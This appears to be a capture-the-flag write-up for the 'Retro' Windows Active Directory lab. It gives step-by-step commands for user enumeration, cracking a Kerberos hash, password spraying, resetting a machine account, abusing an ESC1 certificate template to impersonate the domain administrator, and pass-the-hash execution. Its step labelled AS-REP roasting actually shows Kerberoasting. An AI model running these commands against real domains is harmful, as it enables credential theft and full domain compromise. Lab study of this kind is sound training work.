Skip to main content

Machine (Easy) - Retro

Writeup for the Retro machine, an easy-level Windows Active Directory environment created by r0BIT. The box involves AS-REP roasting, password reuse, and an AD CS ESC1 abuse path using a misconfigured computer account template.

Writeup Author: BobBuilder

Objective: Abuse a vulnerable certificate template via a misconfigured machine account to impersonate the domain administrator.

Category Difficulty Platform Machine Author
Machine Easy Windows r0BIT

Root

Step 1: Enumerate Domain Users via Guest

impacket-lookupsid retro.vl/guest:''@retro.vl -no-pass

We find:

RETRO\jburley
RETRO\BANKING$
RETRO\trainee
RETRO\tblack

Step 2: AS-REP Roasting

We check if any of these users have Kerberos preauth disabled:

impacket-GetUserSPNs -target-domain retro.vl -usersfile retro_users.txt retro.vl/guest:'' -no-pass

BANKING$ has an SPN and yields a TGS hash. We crack it using Hashcat:

hashcat -m 13100 hashes.txt uniq.lst

Step 3: Try SMB Authentication

nxc smb <retro_ip> -u 'BANKING$' -p '<REDACTED>'
  • Fails with STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT — common for machine accounts.

We try the cracked password against other known usernames:

nxc smb <retro_ip> -u retro_users.txt -p '<REDACTED>'
  • trainee:<REDACTED> is a valid login.

Step 4: Enumerate SMB Shares

nxc smb <retro_ip> -u trainee -p <REDACTED> -M spider_plus -o DOWNLOAD_FLAG=True

Two files are discovered:

  • Notes/ToDo.txt – Mentions an old computer account used by the finance department.
  • Trainees/Important.txt – All trainees use the same shared account: trainee:trainee

Step 5: Reset the Computer Account Password

We reset BANKING$'s password using its old credentials:

impacket-changepasswd 'retro.vl/<REDACTED>':banking@retro.vl -newpass Password1 -dc-ip <dc_ip> -p rpc-samr

This allows us to authenticate as BANKING$ using Password1.

Step 6: Enumerate AD CS

nxc ldap <retro_ip> -u 'RETRO\BANKING$' -p 'Password1' -M adcs

We identify a vulnerable certificate template named RetroClients.

certipy-ad find -vulnerable -u 'BANKING$@retro.vl' -p 'Password1' -stdout -dc-ip <retro_ip>

Key points:

  • RETRO.VL\Domain Computers can enroll
  • EnrolleeSuppliesSubject is set
  • Client Authentication is enabled

→ This is vulnerable to ESC1 abuse.

Step 7: Request Certificate with Correct Key Length

Default key length causes an error, so we use the correct one (4096):

certipy-ad req -u 'BANKING$@retro.vl' -p 'Password1' -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip <retro_ip> -key-size 4096

This issues a certificate for the Domain Administrator.

Step 8: Use Certificate to Authenticate

Make sure local time matches the domain controller:

sudo net time set -S dc01.retro.vl

Authenticate with the certificate:

certipy-ad auth -pfx administrator.pfx -dc-ip <retro_ip>

Successfully retrieves:

  • TGT for administrator@retro.vl
  • NT hash for the administrator account

Step 9: Execute as Administrator

Use the NT hash to execute remote commands:

impacket-smbexec administrator@retro.vl -hashes <REDACTED>
Back to top